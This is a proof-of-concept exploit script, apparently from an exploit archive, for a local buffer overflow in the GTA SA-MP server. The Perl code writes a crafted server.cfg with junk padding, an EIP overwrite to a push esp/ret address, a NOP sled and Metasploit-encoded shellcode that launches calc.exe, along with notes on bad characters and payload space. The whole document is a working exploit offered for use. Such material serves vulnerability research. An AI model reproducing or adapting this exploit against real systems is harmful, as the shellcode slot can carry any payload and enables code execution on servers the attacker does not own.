# GTA SA-MP server.cfg Local Buffer Overflow Vulnerability (0day) # Date: 9-26-11 # Author: Silent_Dream # Software Link: http://team.sa-mp.com/files/samp03csvr_R2-2_win32.zip # Tested on: XP SP3, Windows 7 # Thanks to: corelanc0d3r & team, Metasploit, Exploit-db. #No PPRs found (app compiled with safeseh on), so this exploit uses EIP overwrite instead. #392 bytes max payload space (after this you hit SEH), 3 badchars: 0x1a, 0x0d, 0x0a. #Triggering Details: Overwrite server.cfg with this file, run samp-server.exe, boom calculator! my $file = "server.cfg"; #file must be named server.cfg for bug to trigger. my $head = "echo "; #probably not needed, tweak if you want. my $junk = "\x41" x 379; my $eip = "\xaa\x9f\x42\x00"; #push esp/ret in samp-server.exe my $nops = "\x90" x 12; my $adjust = "\x81\xc4\x54\xf2\xff\xff"; #add esp, -3500 my $shellcode = #x86/shikata_ga_nai succeeded with size 227 (iteration=1) #Metasploit windows/exec calc.exe -b '\x1a\x0d\x0a' "\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9" . "\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3" . "\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5" . "\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71" . "\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0" . "\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16" . "\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd" . "\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a" . "\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93" . "\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20" . "\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc" . "\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc" . "\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda" . "\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e" . "\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92" . "\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2" . "\x5e\xa4\xb4"; open($File, ">$file"); print $File $head.$junk.$eip.$nops.$adjust.$shellcode; close($FILE);